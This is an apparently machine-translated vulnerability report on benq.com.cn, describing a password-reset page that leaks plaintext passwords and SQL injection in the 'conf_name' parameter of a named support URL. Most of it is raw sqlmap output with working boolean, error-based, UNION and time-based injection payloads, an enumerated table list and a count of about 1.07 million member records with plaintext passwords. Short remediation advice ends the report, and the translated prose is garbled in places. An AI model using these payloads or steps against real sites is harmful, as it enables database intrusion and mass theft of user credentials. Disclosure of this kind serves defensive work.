Website vulnerability collection of an electronic communication company + 1.07 million member password plaintext and Solution

Website vulnerability collection of an electronic communication company + 1.07 million member password plaintext and Solution

Website address: www.benq.com. cn2 vulnerabilities:

1. password retrieval causes password leakage;

Go to the main site, click "quick Logon" at the top, click "Remember password", enter the account number and verification code, and the next step will go to the error page, print out the SQL statement, and... In plaintext with a password.


In this case, I felt that the security awareness of this site is not high, and there may be other problems. When I clicked it, I found the following SQL injection.


2. SQL Injection on a page. You can use SQL-shell to view the following important information:

Page URL: http://www.benq.com.cn/support/drivers? Conf_name = monitor & prod_model = BL2201M, where the conf_name parameter can be injected

A) You can view the Administrator account password and other information;

B) query the information of the 1.07 million registered member, including the plaintext of the password.

 

Question 1: password retrieval vulnerability:

1. Enter the password retrieval page and enter relevant information.

2. After the next step, go to the error page. The MD5 and plaintext values of the password are displayed.

 

Question 2: SQL Injection

Step 2: display the database name. In fact, you can see the error page above, which is benq.

sqlmap identified the following injection points with a total of 42 HTTP(s) requests:---Place: GETParameter: conf_name    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: conf_name=monitor' AND 9677=9677 AND 'JRvg'='JRvg&prod_model=BL2201M    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause    Payload: conf_name=monitor' AND (SELECT 8378 FROM(SELECT COUNT(*),CONCAT(0x7167706971,(SELECT (CASE WHEN (8378=8378) THEN 1 ELSE 0 END)),0x71726e6871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kWDG'='kWDG&prod_model=BL2201M    Type: UNION query    Title: MySQL UNION query (NULL) - 1 column    Payload: conf_name=monitor' UNION ALL SELECT CONCAT(0x7167706971,0x6c726761534a59556d6c,0x71726e6871)#&prod_model=BL2201M    Type: AND/OR time-based blind    Title: MySQL > 5.0.11 AND time-based blind    Payload: conf_name=monitor' AND SLEEP(5) AND 'Pnry'='Pnry&prod_model=BL2201M---web application technology: PHP 5.4.23back-end DBMS: MySQL 5.0available databases [2]:[*] benq[*] information_schema

Step 2: List name. Two important tables, auth _ user and member _ users, should be the administrator table and member table.
 

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: conf_name    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: conf_name=monitor' AND 9677=9677 AND 'JRvg'='JRvg&prod_model=BL2201M    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause    Payload: conf_name=monitor' AND (SELECT 8378 FROM(SELECT COUNT(*),CONCAT(0x7167706971,(SELECT (CASE WHEN (8378=8378) THEN 1 ELSE 0 END)),0x71726e6871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kWDG'='kWDG&prod_model=BL2201M    Type: UNION query    Title: MySQL UNION query (NULL) - 1 column    Payload: conf_name=monitor' UNION ALL SELECT CONCAT(0x7167706971,0x6c726761534a59556d6c,0x71726e6871)#&prod_model=BL2201M    Type: AND/OR time-based blind    Title: MySQL > 5.0.11 AND time-based blind    Payload: conf_name=monitor' AND SLEEP(5) AND 'Pnry'='Pnry&prod_model=BL2201M---web application technology: PHP 5.4.23back-end DBMS: MySQL 5.0Database: benq[89 tables]+----------------------------+| auth__log                  || auth__operates             || auth__user                 || benq__cms_follow_bak       || benq__cms_footer_bak       || benq__cms_menu_bak         || benq__conf                 || benq__conf_section         || benq__names                || benq__names_bak            || benq__prod                 || benq__prod_3dgls           || benq__prod_benjoy          || benq__prod_box             || benq__prod_class           || benq__prod_conf            || benq__prod_conf_search     || benq__prod_conf_search_bak || benq__prod_diy             || benq__prod_dsc             || benq__prod_dsk             || benq__prod_earphone        || benq__prod_figure          || benq__prod_gaopaiyi        || benq__prod_ifp             || benq__prod_images          || benq__prod_kbd             || benq__prod_kmcombo         || benq__prod_lcd             || benq__prod_lfd             || benq__prod_mopo            || benq__prod_mouse           || benq__prod_pc              || benq__prod_printer         || benq__prod_prj             || benq__prod_scanner         || benq__prod_search          || benq__prod_subclass        || benq__prod_tag             || benq__tags                 || benq__tags_assoc           || cms__alt                   || cms__anchor                || cms__article               || cms__associate             || cms__category              || cms__driver                || cms__driver_include        || cms__email                 || cms__event                 || cms__follow                || cms__footer                || cms__indivi_seo            || cms__indivi_seo_bak        || cms__info                  || cms__info_bak              || cms__info_include          || cms__menu                  || cms__page                  || cms__page_section          || cms__pic                   || cms__pic_rule              || cms__pic_size              || cms__pic_tag               || cms__resource              || cms__resource_content      || cms__resource_html         || cms__section_associate     || cms__section_layout        || cms__section_link          || cms__section_template      || cms__service_center        || cms__service_center_assoc  || cms__template              || image_move_temp            || member__bind               || member__prod_reg           || member__profile            || member__recommend          || member__users              || mobi__article              || mobi__article_category     || mobi__buyapply             || mobi__info                 || mobi__layout               || mobi__page                 || mobi__resource             || mobi__search               || mobi__seo                  |+----------------------------+

Step 2: Skip the contents of the Administrator table. The password retrieval vulnerability found that the member's password was displayed in plain text, indicating that the database should be the Saved Password in plain text. It slightly confirmed your conjecture and looked at the data of member _ users in the table below, the last column is the plaintext of the password.

Finally, let's take a look at the total number of members, with more than 1.07 million members.
 

web application technology: PHP 5.4.23back-end DBMS: MySQL 5.0select count(*) from member__users;:    '1075524'

Data viewed during the test has been deleted after the dark clouds are submitted ~

Solution:

1. Fixed the password retrieval function and redirected the error page;

2. SQL Injection prevention. You can use nginx and other functions for front-end filtering. The modification workload is small and the effect is good.

To Mingji manufacturer: send a gift, preferably Mingji product. I am your loyal customer.